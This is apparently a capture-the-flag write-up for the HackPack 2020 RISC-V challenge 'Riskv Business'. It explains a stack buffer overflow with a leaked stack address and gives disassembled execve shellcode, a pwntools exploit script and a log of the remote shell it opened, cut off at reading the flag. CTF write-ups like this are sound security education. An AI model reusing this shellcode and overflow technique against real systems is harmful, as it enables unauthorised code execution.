Rating: 1.0
# Riskv Business
by mito
## 14 Solves, 494pt
This is a `RISC-V 64bit` binary challenge.
$ file pwnme
pwnme: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=767a1cb9134fcea1f054ec211aacb7bea0c5d0d2, not stripped
The vulnerability in this binary is a simple `Stack BoF`.
The stack address(`0x4000800c80`) is leaked.
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
(Please file your answer in memory at location 0x4000800c80...):
We do not have an environment to run RISC-V 64bit binary.
First,we installed `QEMU` referring to the following.
We were able to run this binary locally in Ubuntu 16.04 64bit LTS.
$ qemu-riscv64 ./pwnme
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
Segmentation fault (core dumped)
Furthermore, we were able to decompile this binary using `Ghidra` by installing the contents of the following URL.
The decompile result of main function is as follows.
int main(void)
char acStack96 [8];
char buff [80];
"Question 1. What kind of sound do you make when the boogey man jumps out of the shadows andyells \'BOO!\' right in your face?!"
printf("(Please file your answer in memory at location %p...):",acStack96);
fflush((FILE *)stdout);
printf("EXACTLY: %s\n");
return 0;
We used to the `RISC-V shellcode` below.
| entry0 ();
| 0x000100b0 0111 addi sp, sp, -32 ; [01] -r-x section size 76 named .text
| 0x000100b2 06ec sd ra, 24(sp)
| 0x000100b4 22e8 sd s0, 16(sp)
| 0x000100b6 13042102 addi s0, sp, 34
| 0x000100ba b767696e lui a5, 0x6e696
| 0x000100be 9387f722 addi a5, a5, 559
| 0x000100c2 2330f4fe sd a5, -32(s0)
| 0x000100c6 b7776810 lui a5, 0x10687
| 0x000100ca 33480801 xor a6, a6, a6
| 0x000100ce 0508 addi a6, a6, 1
| 0x000100d0 7208 slli a6, a6, 0x1c
| 0x000100d2 b3870741 sub a5, a5, a6
| 0x000100d6 9387f732 addi a5, a5, 815
| 0x000100da 2332f4fe sd a5, -28(s0)
| 0x000100de 930704fe addi a5, s0, -32
| 0x000100e2 0146 li a2, 0
| 0x000100e4 8145 li a1, 0
| 0x000100e6 3e85 mv a0, a5
| 0x000100e8 9308d00d li a7, 221
| 0x000100ec 93063007 li a3, 115
| 0x000100f0 230ed1ee sb a3, -260(sp)
| 0x000100f4 9306e1ef addi a3, sp, -258
\ 0x000100f8 6780e6ff jr -2(a3)
We tried debugging with `gdb-multiarch` and `gef`, but couldn't completely disassemble `RISC-V`.
Therefore, we made the Exploit code by referring to the C code.
Exploit code and execution result is below.
from pwn import *
#context.log_level = 'debug'
BINARY = './pwnme'
#elf = ELF(BINARY)
shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xee\x93\x06\xe1\xef\x67\x80\xe6\xff"
if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = "cha.hackpack.club"
PORT = 41700
s = remote(HOST, PORT)
elif len(sys.argv) > 1 and sys.argv[1] == 'd':
s = process("qemu-riscv64 -g 1337 ./pwnme", shell=True)
s = process("qemu-riscv64 ./pwnme", shell=True)
s.recvuntil("location 0x")
r = s.recvuntil(".")[:-1]
stack_addr = int(r, 16)
print "stack_addr =", hex(stack_addr)
buf = shellcode
buf += "A"*(88-len(buf))
buf += p64(stack_addr)
mito@ubuntu:~/CTF/HackPack_CTF_2020/Pwn_Riskv_Business$ python solve.py r
[+] Opening connection to cha.hackpack.club on port 41700: Done
stack_addr = 0x4000800c80
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cd /app
$ ls -l
total 3772
-rw-rw-r-- 1 root root 47 Apr 13 15:47 flag.txt
-rwxr-xr-x 1 root root 447800 Apr 13 15:57 pwnme
-rwxrwxr-x 1 root root 3406664 Apr 13 15:47 qemu-riscv64-static
$ cat flag.txt